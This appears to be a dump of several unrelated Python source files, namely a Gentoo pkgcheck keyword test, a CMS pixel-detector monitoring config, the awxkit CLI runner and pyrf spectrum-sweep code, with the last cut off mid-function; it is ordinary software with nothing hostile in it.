[self.mk_pkg("1", "x86 ~amd64"),
self.mk_pkg("2", key)])
# ensure it doesn't flag live ebuilds
self.assertNoReport(
check,
[self.mk_pkg("1", "x86 amd64"),
self.mk_pkg("9999", "", PROPERTIES='live')])
def test_verbose_mode(self):
# verbose mode outputs a report per version with dropped keywords
check = self.mk_check(verbosity=1)
reports = self.assertReports(
check,
[self.mk_pkg("1", "amd64 x86"),
self.mk_pkg("2", "amd64"),
self.mk_pkg("3", "amd64")])
assert len(reports) == 2
assert {x.version for x in reports} == {"2", "3"}
assert set().union(*(x.arches for x in reports)) == {"x86"}
def test_regular_mode(self):
# regular mode outputs the most recent pkg with dropped keywords
check = self.mk_check()
reports = self.assertReports(
check,
[self.mk_pkg("1", "x86 amd64"),
self.mk_pkg("2", "amd64"),
self.mk_pkg("3", "amd64")])
assert len(reports) == 1
assert reports[0].version == '3'
assert set().union(*(x.arches for x in reports)) == {"x86"}
|
65919
|
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDHarvester import DQMEDHarvester
from DQM.SiPixelPhase1Common.HistogramManager_cfi import *
import DQM.SiPixelPhase1Common.TriggerEventFlag_cfi as trigger
SiPixelPhase1TrackEfficiencyValid = DefaultHistoTrack.clone(
name = "valid",
title = "Valid Hits",
range_min = 0, range_max = 50, range_nbins = 50,
xlabel = "valid hits",
dimensions = 0,
specs = VPSet(
StandardSpecifications1D_Num,
#StandardSpecification2DProfile_Num, #for this we have the on track clusters map (i.e the same thing)
Specification().groupBy("PXBarrel/PXLayer/Event") #this will produce inclusive counts per Layer/Disk
.reduce("COUNT")
.groupBy("PXBarrel/PXLayer")
.save(nbins=50, xmin=0, xmax=1500),
Specification().groupBy("PXForward/PXDisk/Event")
.reduce("COUNT")
.groupBy("PXForward/PXDisk/")
.save(nbins=50, xmin=0, xmax=1500),
)
)
SiPixelPhase1TrackEfficiencyInactive = DefaultHistoTrack.clone(
name = "inactive",
title = "Inactive Hits",
xlabel = "inactive hits",
range_min = 0, range_max = 25, range_nbins = 25,
dimensions = 0,
specs = VPSet(
StandardSpecification2DProfile_Num,
Specification().groupBy("PXBarrel/PXLayer/Event") #this will produce inclusive counts per Layer/Disk
.reduce("COUNT")
.groupBy("PXBarrel/PXLayer")
.save(nbins=50, xmin=0, xmax=100),
Specification().groupBy("PXForward/PXDisk/Event")
.reduce("COUNT")
.groupBy("PXForward/PXDisk/")
.save(nbins=50, xmin=0, xmax=100),
)
)
SiPixelPhase1TrackEfficiencyMissing = DefaultHistoTrack.clone(
name = "missing",
title = "Missing Hits",
range_min = 0, range_max = 25, range_nbins = 25,
xlabel = "missing hits",
dimensions = 0,
specs = VPSet(
StandardSpecifications1D_Num,
StandardSpecification2DProfile_Num,
Specification().groupBy("PXBarrel/PXLayer/Event") #this will produce inclusive counts per Layer/Disk
.reduce("COUNT")
.groupBy("PXBarrel/PXLayer")
.save(nbins=50, xmin=0, xmax=100),
Specification().groupBy("PXForward/PXDisk/Event")
.reduce("COUNT")
.groupBy("PXForward/PXDisk/")
.save(nbins=50, xmin=0, xmax=100),
)
)
SiPixelPhase1TrackEfficiencyEfficiency = SiPixelPhase1TrackEfficiencyValid.clone(
name = "hitefficiency",
title = "Hit Efficiency",
xlabel = "#valid/(#valid+#missing)",
dimensions = 1,
specs = VPSet(
StandardSpecification2DProfile,
#profiles per layer and shell
Specification(PerLadder).groupBy("PXBarrel/Shell/PXLayer/SignedLadder")
.reduce("MEAN")
.groupBy("PXBarrel/Shell/PXLayer", "EXTEND_X")
.save(),
Specification(PerLadder).groupBy("PXForward/HalfCylinder/PXRing/PXDisk/SignedBlade")
.reduce("MEAN")
.groupBy("PXForward/HalfCylinder/PXRing/PXDisk", "EXTEND_X")
.save(),
#per layer
Specification().groupBy("PXBarrel/PXLayer")
.reduce("MEAN")
.groupBy("PXBarrel", "EXTEND_X")
.save(),
Specification().groupBy("PXForward/PXDisk")
.reduce("MEAN")
.groupBy("PXForward", "EXTEND_X")
.save(),
Specification(PerLayer2D)
.groupBy("PXBarrel/PXLayer/Lumisection")
.groupBy("PXBarrel/PXLayer", "EXTEND_X")
.groupBy("PXBarrel", "EXTEND_Y")
.reduce("MEAN")
.save(),
Specification(PerLayer2D)
.groupBy("PXForward/PXDisk/Lumisection")
.groupBy("PXForward/PXDisk", "EXTEND_X")
.groupBy("PXForward", "EXTEND_Y")
.reduce("MEAN")
.save(),
)
)
SiPixelPhase1TrackEfficiencyVertices= DefaultHistoTrack.clone(
name = "num_vertices",
title = "PrimaryVertices",
xlabel= "# Vertices",
dimensions = 1,
range_min = -0.5,
range_max = 100.5,
range_nbins =101,
specs = VPSet(
Specification().groupBy("")
.save(),
Specification().groupBy("/Lumisection")
.reduce("MEAN")
.groupBy("","EXTEND_X")
.save()
)
)
from Configuration.Eras.Modifier_run3_common_cff import run3_common
run3_common.toModify(SiPixelPhase1TrackEfficiencyVertices, range_max = 150.5, range_nbins=151)
SiPixelPhase1TrackEfficiencyConf = cms.VPSet(
SiPixelPhase1TrackEfficiencyValid,
SiPixelPhase1TrackEfficiencyMissing,
SiPixelPhase1TrackEfficiencyInactive,
SiPixelPhase1TrackEfficiencyEfficiency,
SiPixelPhase1TrackEfficiencyVertices
)
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
SiPixelPhase1TrackEfficiencyAnalyzer = DQMEDAnalyzer('SiPixelPhase1TrackEfficiency',
clusters = cms.InputTag("siPixelClusters"),
tracks = cms.InputTag("generalTracks"),
trajectoryInput = cms.InputTag("refittedForPixelDQM"),
primaryvertices = cms.InputTag("offlinePrimaryVertices"),
tracker = cms.InputTag("MeasurementTrackerEvent"),
histograms = SiPixelPhase1TrackEfficiencyConf,
geometry = SiPixelPhase1Geometry,
triggerflags = trigger.SiPixelPhase1Triggers,
VertexCut = cms.untracked.bool(True)
)
SiPixelPhase1TrackEfficiencyHarvester = DQMEDHarvester("SiPixelPhase1Harvester",
histograms = SiPixelPhase1TrackEfficiencyConf,
geometry = SiPixelPhase1Geometry
)
|
65926
|
import json
import sys
import traceback
import yaml
import urllib3
from requests.exceptions import ConnectionError, SSLError
from .client import CLI
from awxkit.utils import to_str
from awxkit.exceptions import Unauthorized, Common
from awxkit.cli.utils import cprint
# you'll only see these warnings if you've explicitly *disabled* SSL
# verification, so they're a little annoying, redundant
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def run(stdout=sys.stdout, stderr=sys.stderr, argv=[]):
cli = CLI(stdout=stdout, stderr=stderr)
try:
cli.parse_args(argv or sys.argv)
cli.connect()
cli.parse_resource()
except KeyboardInterrupt:
sys.exit(1)
except ConnectionError as e:
cli.parser.print_help()
msg = (
'\nThere was a network error of some kind trying to reach '
'{}.\nYou might need to specify (or double-check) '
'--conf.host'.format(cli.get_config('host'))
)
if isinstance(e, SSLError):
msg = (
'\nCould not establish a secure connection. '
'\nPlease add your server to your certificate authority.'
'\nYou can also run this command by specifying '
'-k or --conf.insecure'
)
cprint(msg + '\n', 'red', file=stderr)
cprint(e, 'red', file=stderr)
sys.exit(1)
except Unauthorized as e:
cli.parser.print_help()
msg = '\nValid credentials were not provided.\n$ awx login --help'
cprint(msg + '\n', 'red', file=stderr)
if cli.verbose:
cprint(e.__class__, 'red', file=stderr)
sys.exit(1)
except Common as e:
if cli.verbose:
print(traceback.format_exc(), sys.stderr)
if cli.get_config('format') == 'json':
json.dump(e.msg, sys.stdout)
print('')
elif cli.get_config('format') == 'yaml':
sys.stdout.write(to_str(
yaml.safe_dump(
e.msg,
default_flow_style=False,
encoding='utf-8',
allow_unicode=True
)
))
elif cli.get_config('format') == 'human':
sys.stdout.write(e.__class__.__name__)
print('')
sys.exit(1)
except Exception as e:
if cli.verbose:
e = traceback.format_exc()
cprint(e, 'red', file=stderr)
sys.exit(1)
|
65933
|
import sys
import math
import random
from collections import namedtuple
import time
from pyrf.util import (compute_usable_bins, adjust_usable_fstart_fstop,
trim_to_usable_fstart_fstop, find_saturation)
import numpy as np
from twisted.internet import defer
from pyrf.numpy_util import compute_fft
import struct
MAXIMUM_SPP = 32768
class correction_vector_acquire(object):
data_buffer = ""
v_type = "SIGNAL"
dut = None
complete_buffer = False
d = None
offset = 0
size = 0
transfer_size = 16*1024
def get_vector_loop(self, data):
self.data_buffer = b"".join([self.data_buffer, data])
self.offset += len(data)
if self.offset >= self.size:
# we have gotten all out data, return this object
if self.d is not None:
self.d.callback(self)
else:
# more data, grab another set of data
data1 = self.dut.correction_data(self.v_type, self.offset,
self.transfer_size)
# and add this function to the call back
data1.addCallback(self.get_vector_loop)
def get_vector_data(self, size):
# We got out size
if size is None:
# size is return None threw our created deffered in get_vector
if self.d is not None:
self.d.callback(None)
return
self.size = int(size)
if self.size == 0:
if self.d is not None:
self.d.callback(None)
return
if self.size < self.transfer_size:
self.transfer_size = self.size
# Grab our first set of data (deffered)
data = self.dut.correction_data(self.v_type, self.offset,
self.transfer_size)
# add the self.get_vector_loop call back
data.addCallback(self.get_vector_loop)
# what happens to error back here?
def error_b(self, failure):
if self.d is not None:
self.d.callback(None)
return None
def get_vector(self, v_type=None):
#
self.v_type = v_type
self.offset = 0
self.data_buffer = ""
# Create a defered
d = defer.Deferred()
self.d = d
# get our size (deffered)
size = self.dut.correction_size(self.v_type)
size.addCallback(self.get_vector_data)
size.addErrback(self.error_b)
# return our deferred
return d
class correction_vector(object):
correction_vectors = None
frequency_index = None
digest = None
def __init__(self):
self.frequency_index = []
self.dy = np.dtype(np.int32)
self.dy = self.dy.newbyteorder('>')
self.correction_vectors = {}
def _binary_search(self, freq):
# Simple binary search, modified to work the object's datastructure
lo = 0
hi = len(self.frequency_index)
while lo < hi:
mid = (lo + hi) // 2
if self.frequency_index[mid][0] * 1e3 < freq:
lo = mid + 1
else:
hi = mid
return lo
def _interp(self, in_array, number_of_points):
# array index of our orignal from 0 to size of vector - 1
x = np.arange(0.0, self.vector_size, 1.0)
# our new index
z = np.linspace(0.0, self.vector_size - 1, number_of_points)
# interpolate to get our new vector array
out_array = np.interp(z, x, in_array)
return out_array
def get_correction_vector(self, freq, number_of_points):
# binary search, retunrs our index
index = self._binary_search(freq)
# get the case where we go off the end
if index == len(self.frequency_index):
index = index - 1
# get our vector
vector = self.correction_vectors[self.frequency_index[index][1]]
# convert from micro db to db
vector = vector / 1000000.0
# interpolate our vector to the wanted size
resampled_vector = self._interp(vector, number_of_points)
return resampled_vector
def buffer_to_vector(self, buffer_in):
if buffer_in is None:
raise ValueError
if len(buffer_in) < 8 + 40:
raise ValueError
# Get the first 8 bytes
offset = 0
size = 8
input_buffer = buffer_in[offset:offset + size]
version, freq_num, vector_num, self.vector_size = struct.unpack("!HHHH", input_buffer)
offset = size
# Ignore the next 40 bytes, as not used know
offset += 40
# grab our frequency list
size = 6 * freq_num
input_buffer = buffer_in[offset:offset + size]
offset += size
if len(input_buffer) < size:
raise ValueError
# loop over our buffer, adding a frequency pair to the array
for i in range(freq_num):
freq, index = struct.unpack("!LH", input_buffer[i*6:i*6+6])
self.frequency_index.append([freq, index])
# grab our correction vectors
for i in range(vector_num):
# Grab out index
size = 2
input_buffer = buffer_in[offset:offset + size]
index = struct.unpack(">H", input_buffer)[0]
offset += size
# get our correction vector
size = 4 * self.vector_size
input_buffer = buffer_in[offset:offset + size]
micro_db = np.frombuffer(input_buffer, dtype=self.dy,
count=self.vector_size)
self.correction_vectors[index] = micro_db
offset += size
class SweepDeviceError(Exception):
"""
Exception for the sweep device to state an error() has occured
"""
pass
class SweepSettings(object):
"""
An object used to keep track of the sweep settings
"""
def __init__(self):
# start frequency of the results we will eventually return
self.bandstart = 0.0
# stop frequency of the results we will eventually return
self.bandstop = 0.0
# sweep entry's start frequency
self.fstart = 0.0
# sweep entry's stop frequency
self.fstop = 0.0
# sweep entry frequency step
self.fstep = 0.0
# sweep entry's RFE mode
self.rfe_mode = None
# determine if a second entry is required
self.dd_mode = False
# determines if a non dd entry is needed
self.beyond_dd = True
# entry attenuation
self.attenuation = 0
# entry ppb
self.ppb = 1
# sweep entry's spp
self.spp = 0.0
# sweep capture iterations
self.iterations = 0
# expected spectral points
self.spectral_points = 0
# determines if a sweep entry is required at the end
self.make_end_entry = False
# determine the frequency of the end entry
self.end_entry_freq = 0.0
# how many steps are in this sweep
self.step_count = 0
# what's the actual RBW of what we're capturing
self.rbw = 0
def __str__(self):
return "SweepSettings[ bandstart = %d, bandstop = %d, fstart = %d, fstop = %d, fstep = %d, step_count = %d, rfe_mode = %s, dd_mode = %s, beyond_dd = %s, attenuation = %s, ppb = %d, spp = %d, iterations = %d, spectral_points = %d, make_end_entry = %s, end_entry_freq = %d, rbw = %f ]" % (self.bandstart, self.bandstop, self.fstart, self.fstop, self.fstep, self.step_count, self.rfe_mode, self.dd_mode, self.beyond_dd, self.attenuation, self.ppb, self.spp, self.iterations, self.spectral_points, self.make_end_entry, self.end_entry_freq, self.rbw)
class SweepPlanner(object):
"""
An object that plans a sweep based on given paramaters.
:param dev_prop: the sweep device properties
:type dev_prop: dict
"""
def __init__(self, dev_prop):
self.dev_properties = dev_prop
self._prev_settings = SweepSettings()
def plan_sweep(self, fstart, fstop, rbw, mode, dev_settings = {}):
"""
Plan the sweep given the inputs
"""
# initialize the sweep settings variable
sweep_settings = SweepSettings()
# assign the sweep mode and start/stop
sweep_settings.rfe_mode = mode
sweep_settings.bandstart = fstart
sweep_settings.bandstop = fstop
if 'attenuator' in dev_settings:
sweep_settings.attenuation = dev_settings['attenuator']
# grab the usable bw of the current mode
usable_bw = self.dev_properties.USABLE_BW[mode]
# calculate the required SPP to get the RBW desired
sweep_settings.spp = self.dev_properties.FULL_BW[mode] / rbw
# find closest multiple of 32 because hardware
sweep_settings.spp = int(32 * round(float(sweep_settings.spp) / 32))
# double the points for SH/SHN mode
if mode in ['SH', 'SHN']:
sweep_settings.spp = sweep_settings.spp * 2
# if we're using zif mode, but we have a DD entry, we have half the SPP avaible, since DD is I-only and ZIF is IQ
if (mode == 'ZIF') and sweep_settings.dd_mode:
maxspp = self.dev_properties.MAX_SPP / 2
else:
maxspp = self.dev_properties.MAX_SPP
# adjust SPP if it's too big
sweep_settings.spp = min(maxspp, sweep_settings.spp)
# figure out our actual RBW (account for real vs complex data)
sweep_settings.rbw = self.dev_properties.FULL_BW[mode] / sweep_settings.spp
if not (mode == 'ZIF'):
sweep_settings.rbw = sweep_settings.rbw * 2
# make sure our result is atleast 1 RBW big
if (sweep_settings.bandstop - sweep_settings.bandstart) < sweep_settings.rbw:
fstop = sweep_settings.bandstart + sweep_settings.rbw
sweep_settings.bandstop = fstop
# change fstart and stop by a bit to account for floating point errors
# TODO: make this take into account tuning resolution
fstart -= sweep_settings.rbw * 4
fstop += sweep_settings.rbw * 4
# calculate fstart frequency
if fstart < self.dev_properties.MIN_TUNABLE[mode]:
sweep_settings.dd_mode = True
sweep_settings.fstart = self.dev_properties.MIN_TUNABLE[mode] + (usable_bw / 2)
sweep_settings.step_count += 1
# make sure we don't accidentally make an fstart that's beyond our tuning range
elif (fstart + (usable_bw / 2)) > self.dev_properties.MAX_TUNABLE[mode]:
sweep_settings.dd_mode = False
sweep_settings.fstart = self.dev_properties.MAX_TUNABLE[mode] - (usable_bw / 2)
else:
sweep_settings.dd_mode = False
sweep_settings.fstart = fstart + (usable_bw / 2)
# check if non-dd mode is required
if fstop <= self.dev_properties.MIN_TUNABLE[mode]:
sweep_settings.beyond_dd = False
else:
sweep_settings.beyond_dd = True
sweep_settings.step_count += 1
# assign the sweep entry's step frequency reducing by a couple rbw to account for floating point errors
# TODO: make this take into account tuning resolution
sweep_settings.fstep = usable_bw - (sweep_settings.rbw * 4)
# calculate the fstop of the sweep entry from fstart and how many usable_bw's we need
fspan = fstop - sweep_settings.fstart - sweep_settings.rbw
required_steps = round(fspan / sweep_settings.fstep)
sweep_settings.fstop = sweep_settings.fstart + (required_steps * sweep_settings.fstep)
sweep_settings.step_count += required_steps
# make sure fstop is lower than max tunable
# - it can sometimes be higher if an fstart is chosen, such that our
# fstep causes our fstop to go beyond fmax to cover all the band required
sweep_settings.make_end_entry = False
sweep_settings.end_entry_freq = 0
if sweep_settings.fstop > self.dev_properties.MAX_TUNABLE[mode]:
# go back one step
sweep_settings.fstop -= sweep_settings.fstep
# add an entry for fmax
sweep_settings.make_end_entry = True
sweep_settings.end_entry_freq = self.dev_properties.MAX_TUNABLE[mode] - (usable_bw / 2)
# calculate the expected number of spectral bins required for the SweepEntry
sweep_settings.spectral_points = int(round((sweep_settings.bandstop - sweep_settings.bandstart) / sweep_settings.rbw))
# return the sweep_settings
return sweep_settings
class SweepDevice(object):
"""
Virtual device that generates power spectrum from a given frequency range
by sweeping the frequencies with a real device and piecing together the FFT results.
:param real_device: the RF device that will be used for capturing data,
typically a :class:`pyrf.devices.thinkrf.WSA` instance.
:param async_callback: a callback to use for async operation (not used if
*real_device* is using a blocking :class:`PlainSocketConnector`)
"""
# keep track of the mode
rfe_mode = None
# keep track of the fstart/fstop and rbw
fstart = None
fstop = None
rbw = None
# keep track of non-standard device settings
device_settings = None
# keep track of whether DD mode is needed
dd_mode = False
# keep track of the sweep settings
_sweep_settings = None
# keep track of the packet count
packet_count = 0
# determine if a new entry is required
_new_entry = True
# array to place spectral data
spectral_data = []
capture_count = 0
sp_corr_obj = None
nf_corr_obj = None
_flattening_enabled = True
def __init__(self, real_device, async_callback=None):
# init log string
self.logstr = ''
self.logtype = 'NONE'
# initialize the real device
self.real_device = real_device
# request read permission from device
self.real_device.request_read_perm()
# keep track of the device properties
self.dev_properties = self.real_device.properties
# initialize the geolocation callback
self._geo_callback_func = None
self._geo_callback_data = None
# initialize the sweep planner
self._sweep_planner = SweepPlanner(self.dev_properties)
# make sure user passes async callback if the device has async connector
if real_device.async_connector():
if not async_callback:
raise SweepDeviceError(
"async_callback required for async operation")
# disable receiving data until we are expecting it
real_device.set_async_callback(None)
# Function to be called when async data is done capturing
def _save_correction_vector(data_buffer):
if data_buffer is None:
return None
try:
if data_buffer.v_type == "SIGNAL":
self.sp_corr_obj = correction_vector()
self.sp_corr_obj.buffer_to_vector(data_buffer.data_buffer)
elif data_buffer.v_type == "NOISE":
self.nf_corr_obj = correction_vector()
self.nf_corr_obj.buffer_to_vector(data_buffer.data_buffer)
except AttributeError:
if data_buffer.v_type == "SIGNAL":
self.sp_corr_obj = None
elif data_buffer.v_type == "NOISE":
self.nf_corr_obj = None
# function to catch the errback of the async code. Used to handle
# the case when we can get the correction vectors.
def _catch_timeout(failure):
failure.trap(IOError)
return None
vector_obj = correction_vector_acquire()
vector_obj.dut = real_device
vector_obj1 = correction_vector_acquire()
vector_obj1.dut = real_device
d1 = vector_obj.get_vector("NOISE")
d1.addCallback(_save_correction_vector)
d1.addErrback(_catch_timeout)
d2 = vector_obj1.get_vector("SIGNAL")
d2.addCallback(_save_correction_vector)
d2.addErrback(_catch_timeout)
else:
# make sure user doesnt pass async callback if the connector uses blocking sockets
if async_callback:
raise SweepDeviceError(
"async_callback not applicable for sync operation")
def _get_correction(dut, v_type=None):
if v_type.upper() == "SIGNAL" or v_type.upper() == "NOISE":
v_type = v_type.upper()
else:
raise ValueError
max_buf_size = 16*1024
offset = 0
bin_data = ""
try:
signal_size = dut.correction_size(v_type)
except (IOError, OSError): # this will handle socket.error's
raise ValueError
# We have nothing to transfer
if signal_size == 0:
return None
# check to see if tere is more data than can be transfer in one
# go
if signal_size > max_buf_size:
# if so transfer our max buffer size
transfer_size = max_buf_size
else:
# if not grab only what we need
transfer_size = signal_size
# While we still have data remaining
while offset < signal_size:
# get the data
data_buffer = dut.correction_data(v_type, offset,
transfer_size)
# figure out how many bytes were transfered
transfered = len(data_buffer)
# append the data to the buffer of what we have allready
# got
bin_data = b"".join([bin_data, data_buffer])
# increase the offset
offset = offset + transfered
return bin_data
self.sp_corr_obj = correction_vector()
try:
self.sp_corr_obj.buffer_to_vector(_get_correction(self.real_device, "SIGNAL"))
except ValueError:
self.sp_corr_obj = None
self.nf_corr_obj = correction_vector()
try:
self.nf_corr_obj.buffer_to_vector(_get_correction(self.real_device, "NOISE"))
except ValueError:
self.nf_corr_obj = None
self.async_callback = async_callback
self.continuous = False
# init the sweep id
self._next_sweep_id = 0
# init last finished (technically, it hasn't finished, but for our purposes, it has)
self._last_finished = True
# Private function
def log(self, firstmsg, *msgs):
if self.logtype == 'LOG':
self.logstr += firstmsg.__str__()
for msg in msgs:
self.logstr += ", "
self.logstr += msg.__str__()
self.logstr += "\n"
elif self.logtype == 'PRINT':
sys.stdout.write(firstmsg.__str__())
for msg in msgs:
sys.stdout.write(", ")
sys.stdout.write(msg.__str__())
sys.stdout.write("\n")
def enable_flattening(self, enable=None):
"""
:param enable: enable or disable spectral flattening
:type enable: bool or None
"""
if enable is None:
return self._flattening_enabled
else:
self._flattening_enabled = enable
def set_geolocation_callback(self, func, data = None):
"""
set a callback that will get called whenever the geolocation information
of the device is updated.
The callback function should accept two parameters. The first parameter
will be the callback data that was passed in this function
set_geolocation_callback(func, data, geolocation_dictionary).
The geolocation_dictionary will have the following properties:
- oui
- seconds
- altitude
- longitude
- speedoverground
- secondsfractional
- track
- latitude
- magneticvariation
- heading
See the programmer's guide for usage on each of these properties.
:param func: the function to be called
:param data: the data to be passed to the function
:returns: None
"""
self._geo_callback_func = func
self._geo_callback_data = data
def capture_power_spectrum(self,
fstart,
fstop,
rbw,
device_settings=None,
mode='SH',
continuous=False):
"""
Initiate a data capture from the *real_device* by setting up a sweep list
and starting a single sweep, and then return power spectral density data
along with the **actual** sweep start and stop frequencies set (which
might not be exactly the same as the requested *fstart* and *fstop*).
.. note:: This function does not pipeline, and if the last sweep isn't received before starting a new one, it will generate a failure.
:param int fstart: sweep starting frequency in Hz
:param int fstop: sweep ending frequency in Hz
:param float rbw: the resolution bandwidth (RBW) in Hz of the data to be captured (output RBW may be smaller than requested)
:param device_settings: attenuation and other device settings
:type device_settings: dict
:param str mode: sweep mode, 'ZIF', 'SH', or 'SHN'
:param bool continuous: set sweep to be continuously or not (once only)
:returns: fstart, fstop, power_data
"""
self.log("- capture_power_spectrum", fstart, fstop, rbw, device_settings, mode, continuous)
if continuous and not self.async_callback:
raise SweepDeviceError(
"continuous mode only applies to async operation")
# see if the last sweep has finished
if not self._last_finished:
raise SweepDeviceError(
"previous sweep must have finished before starting a new one")
self._last_finished = False
# increment the sweep id
if self._next_sweep_id < 0x00000000ffffffff:
self._next_sweep_id += 1
else:
self._next_sweep_id = 0
# keep track if this is a continuous sweep
self.continuous = continuous
# plan the sweep
self._sweep_planner = SweepPlanner(self.dev_properties)
self._sweep_settings = self._sweep_planner.plan_sweep(fstart, fstop, rbw, mode, device_settings)
self.log("self._sweep_settings = %s" % self._sweep_settings)
# remember our last sweep for optimization purposes
self._last_sweep = (fstart, fstop, rbw, mode, device_settings, continuous)
# configure the device with the sweep_settings
self.real_device.sweep_clear()
self.real_device.sweep_add(self._sweep_settings)
# configure the iteration
self.real_device.sweep_iterations(1)
# capture the sweep data
return self._perform_full_sweep()
def _perform_full_sweep(self):
# perform the sweep using async socket
if self.async_callback:
# set the async callback
self.real_device.set_async_callback(self._vrt_receive)
# start the sweep sequence
self._start_sweep()
return
# perform sweep using blocking sockets
self._start_sweep()
result = None
while result is None:
result = self._vrt_receive(self.real_device.read())
return result
def _start_sweep(self):
self._vrt_context = {}
# initialize the array we'll use to hold results
self.spectral_data = np.zeros(self._sweep_settings.spectral_points)
# keep track of packets recieved
self.packet_count = 0
self.real_device.sweep_start(self._next_sweep_id)
def _vrt_receive(self, packet):
# context packet just update our context dictionary
if packet.is_context_packet():
# look for any geolocation info
geo = { }
for field in [ 'latitude', 'longitude', 'altitude', 'speedoverground', 'heading', 'track', 'magneticvariation' ]:
if field in packet.fields:
geo[field] = packet.fields[field]
if geo and self._geo_callback_func:
# execute callback
func = self._geo_callback_func
func(self._geo_callback_data, geo)
self._vrt_context.update(packet.fields)
self.log(packet)
return
# check to see if we recieved our sweep ID
if not ('sweepid' in self._vrt_context):
return
# make sure we are receiving packets for the right sweep
if not (self._vrt_context['sweepid'] == self._next_sweep_id):
raise SweepDeviceError("data packets received before start of sweep received! cur = %d, next = %d" % (self._vrt_context['sweepid'], self._next_sweep_id))
# increment the packet count
self.packet_count += 1
self.log("#%d of %d - %s" % (self.packet_count, self._sweep_settings.step_count, packet))
# retrieve the frequency and usable BW of the packet
packet_freq = self._vrt_context['rffreq']
usable_bw = self.dev_properties.USABLE_BW[self._sweep_settings.rfe_mode]
# compute the fft
pow_data = compute_fft(self.real_device, packet, self._vrt_context)
# calc rbw for this packet
rbw = float(self.dev_properties.FULL_BW[self._sweep_settings.rfe_mode]) / len(pow_data)
self.log("rbw = %f, %f" % (rbw, self._sweep_settings.rbw))
if self._flattening_enabled:
# Check if we are above 50 MHz and in SH mode
if packet_freq >= 50e6 and self._sweep_settings.rfe_mode == "SH":
number_of_points = len(pow_data)
# check if we have correction vectors (Noise)
if self.nf_corr_obj is not None:
# if so grab them
nf_cal = \
self.nf_corr_obj.get_correction_vector(packet_freq,
number_of_points)
else:
# if no set it to 0
nf_cal = np.zeros(number_of_points)
# check if we have corrrection vectors (Spectrum)
if self.sp_corr_obj is not None:
# if so grab them
sp_cal = \
self.sp_corr_obj.get_correction_vector(packet_freq,
number_of_points)
else:
# if not set it to 0
sp_cal = np.zeros(number_of_points)
# if the data is spectraly inverted, invert the vectors
if packet.spec_inv:
nf_cal = np.flipud(nf_cal)
sp_cal = np.flipud(sp_cal)
# calculate the correction threshold
correction_thresh = (-135.0 + ((10.0 * packet_freq / 1e6)
/ 27000.0) + 10.0
* np.log10(rbw)
+ self._sweep_settings.attenuation)
# creat the spectrum. per bin, if the ampltitude is above
# correction threshold do pow_data - sp_cal else do pow_data -
# nf_cal
pow_data = np.where(pow_data < correction_thresh,
pow_data - nf_cal, pow_data - sp_cal)
# check if DD mode was used in this sweep
if self.packet_count == 1 and self._sweep_settings.dd_mode:
# copy the data into the result array
self._copy_data(0, self.dev_properties.FULL_BW['DD'], pow_data, self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data);
if self._sweep_settings.beyond_dd:
return
else:
return self._emit_data()
# determine the usable bins in this config
self.log("===> compute_usable_bins()", self._sweep_settings.rfe_mode, self._sweep_settings.spp, 1, 0)
usable_bins = compute_usable_bins(self.dev_properties,
self._sweep_settings.rfe_mode,
self._sweep_settings.spp,
1,
0)
self.log("<--- usable_bins", usable_bins)
# adjust the usable range based on spectral inversion
self.log("===> adjust_usable_fstart_fstop()", "self.dev_properties", self._sweep_settings.rfe_mode, len(pow_data) * 2, 1, packet_freq, packet.spec_inv, usable_bins)
usable_bins, packet_start, packet_stop = adjust_usable_fstart_fstop(self.dev_properties,
self._sweep_settings.rfe_mode,
len(pow_data) * 2,
1,
packet_freq,
packet.spec_inv,
usable_bins)
self.log("<--- adjust_usable_fstart_fstop", packet_start, packet_stop, usable_bins)
#
# WARNING: the start and stop returned from this function are HIGHLY sketchy
#
# calculate packet frequency range
#packet_start = packet_freq - (self.dev_properties.FULL_BW[self._sweep_settings.rfe_mode] / 2)
#packet_stop = packet_freq + (self.dev_properties.FULL_BW[self._sweep_settings.rfe_mode] / 2)
#print "packet start/stop", packet_start, packet_stop
#trim the FFT data, note decimation is 1, fshift is 0
self.log("===> trim_to_usable_fstart_fstop()", "pow_data", usable_bins, packet_start, packet_stop)
trimmed_spectrum, edge_data, usable_start, usable_stop = trim_to_usable_fstart_fstop(pow_data,
usable_bins,
packet_start,
packet_stop)
self.log("<--- trim_to_usable_fstart_fstop", usable_start, usable_stop, "trimmed_spectrum", edge_data)
# copy the data
self._copy_data(usable_start, usable_stop, trimmed_spectrum, self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data);
# if there's no more packets, emit result
if self.packet_count == self._sweep_settings.step_count:
return self._emit_data()
# all done
return
def _emit_data(self):
# note that we finished this sweep
self._last_finished = True
# if async callback is available, emit the data
if self.async_callback:
self.async_callback(self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data)
return
# return the values if using blocking sockets
else:
return (self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data)
def _copy_data(self, src_fstart, src_fstop, src_psd, dst_fstart, dst_fstop, dst_psd):
self.log("_copy_data(%d, %d, src_psd, %d, %d, dst_psd)" % (src_fstart, src_fstop, dst_fstart, dst_fstop))
# calc src len and dst len
srclen = len(src_psd)
dstlen = len(dst_psd)
self.log("len -- src = %d, dst = %d" % (srclen, dstlen))
# calc src and dest rbw
srcrbw = float(src_fstop - src_fstart) / srclen
dstrbw = float(dst_fstop - dst_fstart) / dstlen
self.log("rbw = %f, %f, %f" % (srcrbw, dstrbw, self._sweep_settings.rbw))
# check if packet start is before sweep start. shouldn't happen, but check anyway
self.log("boundary(start) = %f / %f" % (src_fstart, dst_fstart))
if src_fstart < dst_fstart:
self.log("foo")
src_start_bin = int(float(dst_fstart - src_fstart) / srcrbw)
else:
self.log("bar")
src_start_bin = 0
# check if packet stop is after sweep stop. this means we don't need the whole packet
self.log("boundary(stop) = %f / %f" % (src_fstop, dst_fstop))
if src_fstop > dst_fstop:
self.log("foo")
src_stop_bin = srclen - int(float(src_fstop - dst_fstop) / srcrbw)
else:
self.log("bar")
src_stop_bin = srclen
# how many values are we copying?
tocopy = src_stop_bin - src_start_bin
# calculate dest start index
if src_fstart < dst_fstart:
dst_start_bin = 0
else:
dst_start_bin = int(round(float(src_fstart - dst_fstart) / dstrbw))
# calculate dest stop index
dst_stop_bin = dst_start_bin + tocopy
if dst_stop_bin > dstlen:
dst_stop_bin = dstlen
# adjust tocopy
tocopy = dst_stop_bin - dst_start_bin
# adjust src stop bin because we adjusted tocopy
